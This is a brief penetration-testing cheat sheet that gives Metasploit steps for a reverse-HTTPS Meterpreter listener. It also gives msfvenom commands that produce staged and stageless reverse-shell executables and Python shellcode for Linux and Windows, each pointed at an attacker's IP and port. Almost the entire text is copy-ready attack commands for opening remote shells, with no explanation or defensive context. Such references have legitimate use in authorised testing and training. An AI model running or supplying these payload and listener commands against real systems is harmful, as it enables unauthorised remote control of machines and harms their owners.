Meterpreter listener reverse-https

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set LHOST <your attacker IP address>

set LPORT <typically 443>

exploit

System Binaries

# Linux reverse shell - Staged

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Linux reverse shell - Stageless

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Windows reverse shell - Staged

msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

# Windows reverse shell - Stageless

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

Shellcode

# Linux Staged - use python or c

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Linux Stageless - use python or c

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged - use python or c

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Stageless - use python or c

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

Last updated